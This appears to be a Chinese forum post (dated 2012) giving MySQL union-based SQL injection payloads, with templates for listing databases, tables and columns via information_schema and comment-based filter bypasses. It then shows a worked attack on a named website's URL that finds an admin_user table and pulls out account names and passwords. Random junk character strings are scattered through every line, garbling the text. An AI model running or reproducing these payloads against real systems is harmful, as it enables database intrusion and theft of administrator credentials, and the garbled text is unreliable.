查库
5 k8 n/ v6 o+ y" |" A: U5 O6 u0 {! J3 f4 B* z
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/** K: V. l/ p. e
# h! u- m& `2 ?( e, u查表
6 W. P6 }5 U, c( t
, m9 W& X; b# G; v/ v2 w# uid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1: p7 c3 n6 d) |
! p# c5 W; A3 r7 Q查段
; n! k8 l$ Q$ z% J3 `( T1 s6 z4 o0 p9 E8 m' a3 B
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1+ ]. W7 C1 {0 k' o6 ], c7 c
: j# X$ N# T, w6 R% h+ {. P) E% b! k9 x3 Q4 x4 u
mysql5高级注入方法暴表) Y7 O9 U k5 H. R- p
5 {" V# S: P( P/ T6 d- z' J例子如下:
4 u$ @/ `/ y* c# [2 M
5 U& A4 l) A2 c, W: P0 w1 E1.爆表
- h7 R, q! Z6 F% T8 [ R7 Dhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)# {" S7 K9 s- N3 E1 R
这样爆到第4个时出现了admin_user表。
$ P* T! q7 e- G1 G
7 ~. u, B7 G* w# k2 H- K2.暴字段
* l7 P( Q6 I; d& chttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
" Q- s* b$ d( Y6 Z1 Y' i% l( }) Y3 {. Q/ G! i
5 J/ {+ M5 `$ c2 |0 k3.爆密码( h0 B# ~) q) O
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* 0 X/ r. A( [! E* m& j# I
9 }+ g: ]$ y" R$ i* y! x
1 y- ^, Y' `: @( o. j; G1 a0 k |
发表于 2012-9-13 16:29:37
收藏
支持
反对